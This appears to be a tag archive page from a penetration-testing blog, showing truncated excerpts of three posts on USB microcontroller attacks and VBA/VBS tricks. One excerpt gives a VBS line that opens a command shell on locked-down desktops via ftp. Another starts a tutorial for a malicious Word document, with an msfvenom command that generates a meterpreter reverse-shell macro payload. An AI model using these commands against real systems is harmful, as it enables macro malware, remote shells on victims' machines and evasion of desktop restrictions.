vba

For those that can’t be bothered to read this post and just want the code, please see here.

So myself and Rich Hicks finally got around to talking about the work we had done with the Teensy. An ATMega, USB-based Microcontroller sold by pjrc.com

I started work on this back in 2011 but didn’t take it any further until Rich came on board towards the end of 2011. We… Continue reading

1. NFTF Quickie – VBS Funtimes – Run Scripts? Get Prompt This is probably a duplicate somewhere but wanted it noted for my own use anyway – here’s a very handy VBS that does the job nicely for accessing useful commands as a user on a locked down desktop. Using VBS to fire up FTP as a local command shell

12Run ftp... CreateObject("WScript.Shell").Run "cmd.exe /k ftp"

Using the above and… Continue reading

So you want/need a malicious word document in order to own a target, step in metasploit.

The first thing you’ll need to do is create the code that you’ll copy&paste into your word document.

1./msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.0.1 LPORT=4444 -f vba > vbcode.txt

The output will contain 2 blocks of code; the macro and the data.

Open a new word document and Press Alt+F11 in order to open “Microsoft Visual… Continue reading